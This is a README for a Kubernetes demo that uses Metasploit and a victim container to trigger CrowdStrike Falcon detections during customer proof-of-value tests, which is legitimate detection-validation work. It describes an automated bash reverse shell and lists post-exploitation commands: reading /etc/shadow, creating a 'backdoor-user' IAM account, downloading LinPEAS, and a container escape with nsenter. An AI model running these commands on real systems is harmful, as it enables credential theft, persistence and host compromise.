A Kubernetes-based security demonstration environment designed for CrowdStrike Proof-of-Value (POV) testing with customers. This environment simulates sophisticated attack scenarios including container escape, cloud credential abuse, and malware execution to trigger comprehensive security detections.
This demo environment deploys containerized Metasploit Framework and victim containers to demonstrate:
- Bash reverse shell connections using TCP redirect for authentic attack signatures
- Container escape techniques using privileged containers
- AWS IAM credential abuse and backdoor creation
- Malware download and execution (LinPEAS, LSE, etc.)
- Data exfiltration simulation
- Complete attack chain automation with professional tooling
pov-shellshock-main/
├── demo-auto.sh # Main orchestration script
├── demo-scripts.yaml # ConfigMap with attack scripts and payloads
├── demo-server.yaml # Containerized Metasploit Framework server
├── demo-client.yaml # Victim container with embedded connection scripts
└── README.md # This file
- Kubernetes cluster with kubectl access
- CrowdStrike Falcon sensor deployed (for detection validation)
kubectlconfigured for your target cluster
-
Clone and navigate to the project:
git clone https://github.com/kuhnskc/shellshock-container-demo.git cd shellshock-container-demo -
Execute the demo:
./demo-auto.sh
-
Monitor CrowdStrike Falcon console for detections during the ~4-minute demo execution
-
Clean up (optional):
kubectl delete -f demo-client.yaml -f demo-server.yaml -f demo-scripts.yaml
- Deploys ConfigMap with attack scripts
- Creates demo-server (Metasploit) and demo-client (victim) pods
- Waits for pod readiness
- Installs Metasploit Framework in demo-server container
- Installs system dependencies and tools
- Prepares attack environment
- Establishes Metasploit listener with AutoRunScript
- Triggers bash reverse shell connection using TCP redirect for realistic attack signatures
- Executes comprehensive post-exploitation commands automatically
- Performs container escape and host-level operations
- Restarts victim pod to clean state
- Maintains attacker infrastructure for analysis
To modify the post-exploitation attack sequence, edit the post_exploit.template section in demo-scripts.yaml:
data:
post_exploit.template: |
# Network reconnaissance
nslookup google.com
ping -c 5 8.8.8.8
# System enumeration
cat /etc/shadow
cat /etc/passwd
ps -A
netstat -anlp
# AWS cloud operations
aws sts get-caller-identity
aws iam create-user --user-name backdoor-user
aws s3 ls
# Malware simulation
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
./lse.sh -l 1 -i -c
# Container escape
nsenter --target 1 --mount --uts --ipc --net --pid -- whoamiAfter making changes, redeploy the ConfigMap:
kubectl apply -f demo-scripts.yamlThis tool is not officially supported by CrowdStrike and is provided as-is for educational and authorized security testing purposes only. Use at your own risk and only in environments where you have explicit permission to conduct security testing.
Co-authored with Claude AI assistance.